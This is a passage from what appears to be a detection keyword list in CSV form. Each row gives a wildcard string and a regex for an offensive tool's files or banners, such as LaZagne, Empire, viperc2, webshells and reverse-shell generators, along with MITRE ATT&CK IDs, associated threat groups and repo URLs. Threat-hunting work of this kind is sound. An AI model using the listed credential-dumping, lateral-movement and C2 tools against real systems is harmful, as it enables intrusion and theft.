TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*Lateral/SMBClientDelete.cs*",".{0,1000}Lateral\/SMBClientDelete\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*Lateral/SMBClientGet.cs*",".{0,1000}Lateral\/SMBClientGet\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*Lateral/SMBClientPut.cs*",".{0,1000}Lateral\/SMBClientPut\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*Lateral/WMIExec.cs*",".{0,1000}Lateral\/WMIExec\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*lateral_wmi.py*",".{0,1000}lateral_wmi\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*LateralMovement_*_Exploit*.py",".{0,1000}LateralMovement_.{0,1000}_Exploit.{0,1000}\.py","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*LateralMovement_ExploitationOfRemoteServices_AuxiliaryMs17010.py*",".{0,1000}LateralMovement_ExploitationOfRemoteServices_AuxiliaryMs17010\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*LateralMovement_ExploitationOfRemoteServices_MS17010.py*",".{0,1000}LateralMovement_ExploitationOfRemoteServices_MS17010\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*LateralMovement_Other_Ladon.py*",".{0,1000}LateralMovement_Other_Ladon\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*LateralMovement_PassTheHash_ByInvokeWMIExec.py*",".{0,1000}LateralMovement_PassTheHash_ByInvokeWMIExec\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*LateralMovement_PassTheHash_ByWmi.py*",".{0,1000}LateralMovement_PassTheHash_ByWmi\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*LateralMovement_PassTheTicket_ByPsexec.py*",".{0,1000}LateralMovement_PassTheTicket_ByPsexec\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*LateralMovement_PassTheTicket_BySharpwmi.py*",".{0,1000}LateralMovement_PassTheTicket_BySharpwmi\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*LateralMovement_PassTheTicket_ByWmi.py*",".{0,1000}LateralMovement_PassTheTicket_ByWmi\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Laudanum PHP File Browser*",".{0,1000}Laudanum\sPHP\sFile\sBrowser.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*Laudanum PHP Hostname by IP Lookup*",".{0,1000}Laudanum\sPHP\sHostname\sby\sIP\sLookup.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*Laudanum PHP Proxy*",".{0,1000}Laudanum\sPHP\sProxy.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*Laudanum PHP Shell Access*",".{0,1000}Laudanum\sPHP\sShell\sAccess.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*Launch Empire CLI*",".{0,1000}Launch\sEmpire\sCLI.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*Launch Empire Server*",".{0,1000}Launch\sEmpire\sServer.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*launch4j launch4j/sAINT.xml*",".{0,1000}launch4j\slaunch4j\/sAINT\.xml.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*LaunchExploitMode.ps1*",".{0,1000}LaunchExploitMode\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*LAUNCHING GPODDITY SMB SERVER AND WAITING FOR GPO REQUESTS*",".{0,1000}LAUNCHING\sGPODDITY\sSMB\sSERVER\sAND\sWAITING\sFOR\sGPO\sREQUESTS.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*LaunchPreCompromise.ps1*",".{0,1000}LaunchPreCompromise\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*lawrenceamer/dns-black-cat*",".{0,1000}lawrenceamer\/dns\-black\-cat.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","1","N/A","10","10","104","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z" "*lawrenceamer/Tchopper*",".{0,1000}lawrenceamer\/Tchopper.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","1","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*layer8secure/SilentHound*",".{0,1000}layer8secure\/SilentHound.{0,1000}","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/layer8secure/SilentHound","1","1","AD Enumeration","7","5","465","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" "*Lazagne*Passwords.txt*",".{0,1000}Lazagne.{0,1000}Passwords\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*laZagne.exe browsers*",".{0,1000}laZagne\.exe\sbrowsers.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*Lazagne.exe*",".{0,1000}Lazagne\.exe.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*laZagne.exe*",".{0,1000}laZagne\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*Lazagne.py*",".{0,1000}Lazagne\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*lazagne.softwares.sysadmin.aws*",".{0,1000}lazagne\.softwares\.sysadmin\.aws.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*lazagne.softwares.windows*",".{0,1000}lazagne\.softwares\.windows.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*lazagne.tar.gz*",".{0,1000}lazagne\.tar\.gz.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*LaZagneForensic*",".{0,1000}LaZagneForensic.{0,1000}","offensive_tool_keyword","LaZagneForensic","Windows passwords decryption from dump files","T1003 - T1081 - T1082","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagneForensic","1","1","N/A","N/A","5","472","109","2023-02-02T16:36:21Z","2018-02-01T15:44:31Z" "*LaZagne-master.zip*",".{0,1000}LaZagne\-master\.zip.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*lazynmap.sh*",".{0,1000}lazynmap\.sh.{0,1000}","offensive_tool_keyword","LALIN","this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . install another and update to new","T1588","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/LALIN","1","1","N/A","N/A","4","354","164","2017-04-13T13:47:21Z","2016-06-10T07:53:49Z" "*lazypariah *",".{0,1000}lazypariah\s.{0,1000}","offensive_tool_keyword","LAZYPARIAH","LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly","T1059 - T1566 - T1212 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/octetsplicer/LAZYPARIAH","1","0","N/A","N/A","2","139","30","2022-06-18T08:59:45Z","2020-11-20T05:08:36Z" "*lazypariah.svg*",".{0,1000}lazypariah\.svg.{0,1000}","offensive_tool_keyword","LAZYPARIAH","LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly","T1059 - T1566 - T1212 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/octetsplicer/LAZYPARIAH","1","1","N/A","N/A","2","139","30","2022-06-18T08:59:45Z","2020-11-20T05:08:36Z" "*L'D', L'b', L'g', L'h', L'e', L'l', L'p', L'.', L'd', L'l', L'l', L'\0'*",".{0,1000}L\'D\',\sL\'b\',\sL\'g\',\sL\'h\',\sL\'e\',\sL\'l\',\sL\'p\',\sL\'\.\',\sL\'d\',\sL\'l\',\sL\'l\',\sL\'\\0\'.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "*ldap as ldap_impacket*",".{0,1000}ldap\sas\sldap_impacket.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*LDAP PASSWORD ENUM*",".{0,1000}LDAP\sPASSWORD\sENUM.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","10","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*LDAP PASSWORD HUNTER*",".{0,1000}LDAP\sPASSWORD\sHUNTER.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","7","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*ldap_enums.go*",".{0,1000}ldap_enums\.go.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","1","AD Enumeration","10","10","1540","144","2024-03-20T16:05:19Z","2020-10-07T10:07:22Z" "*ldap_shell.py*",".{0,1000}ldap_shell\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*ldapasn1.py*",".{0,1000}ldapasn1\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*ldapattack.py*",".{0,1000}ldapattack\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*ldapattack.py*",".{0,1000}ldapattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - 